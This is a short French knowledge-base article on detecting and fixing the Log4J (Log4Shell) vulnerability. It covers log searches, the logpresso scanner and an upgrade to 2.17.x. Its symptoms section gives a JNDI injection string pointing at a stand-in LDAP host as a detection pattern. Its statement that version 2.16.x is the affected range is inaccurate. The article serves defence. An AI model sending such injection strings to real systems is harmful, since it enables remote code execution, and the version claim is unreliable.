Skip to main content

KB-Sécurité-Faille - LOG4J : scan et remédiation

Symptôme(s)

Pour voir si la faille a été exploitée, parcourir les logs java et chercher les lignes contenant les entrées suivantes :

{jndi:ldap://example.com:1234/callback}


Problème

La faille Log4J touche les version du pluggin 2.16.x

Elle permet a un hacker d’envoyer des jeux d’instruction à travers le service de logging et d’injecter des fichiers / exécuter du code sur la machine.

image.pngimage.png


Solution

Sur les serveurs vulnérables, télécharger l’outils log4j-scaner correspodant à l’OS du serveur.

Télécharger l'outil :  logpresso / CVE-2021-44228-Scanner

Scanner l’ordinateur avec la commande :

log4j-scan --all-drives

image.pngimage.png

image.pngimage.png

Si des failles sont trouvées, deux solutions :

  • Utiliser la commande log4j-scan --fix ( cela aura pour effet de désactiver les classes potentiellement vulnérables)
  • mettre à jour les pluggins java au dessus de la version 2.17.x

Sources